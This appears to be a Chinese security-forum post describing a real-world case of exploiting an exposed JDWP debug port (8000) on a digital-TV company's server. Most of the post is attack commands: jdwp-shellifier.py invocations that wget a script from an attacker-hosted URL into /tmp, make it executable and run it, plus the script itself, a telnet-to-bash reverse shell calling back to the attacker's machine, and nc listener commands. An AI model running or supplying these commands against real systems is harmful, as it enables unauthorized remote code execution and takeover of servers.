-
-
[旧帖]
[推荐]jdwp 反弹 shell 实战案例
0.00雪花
-
-
[旧帖] [推荐]jdwp 反弹 shell 实战案例
0.00雪花
反弹shell实战案列:
测试中遇到一个某数字电视jdwp 漏洞,
域名:
9c9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2^5P5q4)9J5k6i4S2^5P5s2S2^5i4K6u0W2j5$3!0E0i4K6u0W2j5$3&6Q4x3@1p5^5x3o6R3H3i4K6u0r3
扫描端口:
发现8000端口 开放jdwp
上利用exp:
(jdwp-shellifier.py )
利用条件需要先访问一下web应用 ,然后执行exp
用法 jdwp-shellifier.py -t 目标IP -p 端口 --cmd "cmd命令"
接下来反弹shell操作:
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget
c2dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2Q4x3X3g2^5i4K6u0W2P5q4)9J5k6i4S2Q4x3V1k6^5i4K6u0W2N6s2S2@1 -O /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t 目标IP -p 端口 --cmd "/tmp/x.sh"
其中 x.txt内容如下:
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
(x.x.x.x 为你自己的外网pc,有路由记得做转发)
然后在x.x.x.x服务器上用nc监听1111端口和3333端口
1111端口是发送命令,3333回显命令结果的
两个cmd窗口
nc -nnv -L -p 3333
nc -nnv -L -p 1111
实际操作:
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "wget
73dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4A6i4K6u0W2P5s2S2^5P5s2S2Q4x3X3g2U0L8$3#2Q4x3V1k6H3K9h3y4Q4x3X3g2@1P5s2b7`. -O /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "chmod a+x /tmp/x.sh"
jdwp-shellifier.py -t *.*.*.* -p 8000 --cmd "/tmp/x.sh"
(其中
8ceK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4A6i4K6u0W2P5s2S2^5P5s2S2Q4x3X3g2U0L8$3#2Q4x3V1k6H3K9h3y4Q4x3X3g2@1P5s2b7`. ,为我事先准备好的一个下载地址,也就是x.txt的内容)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课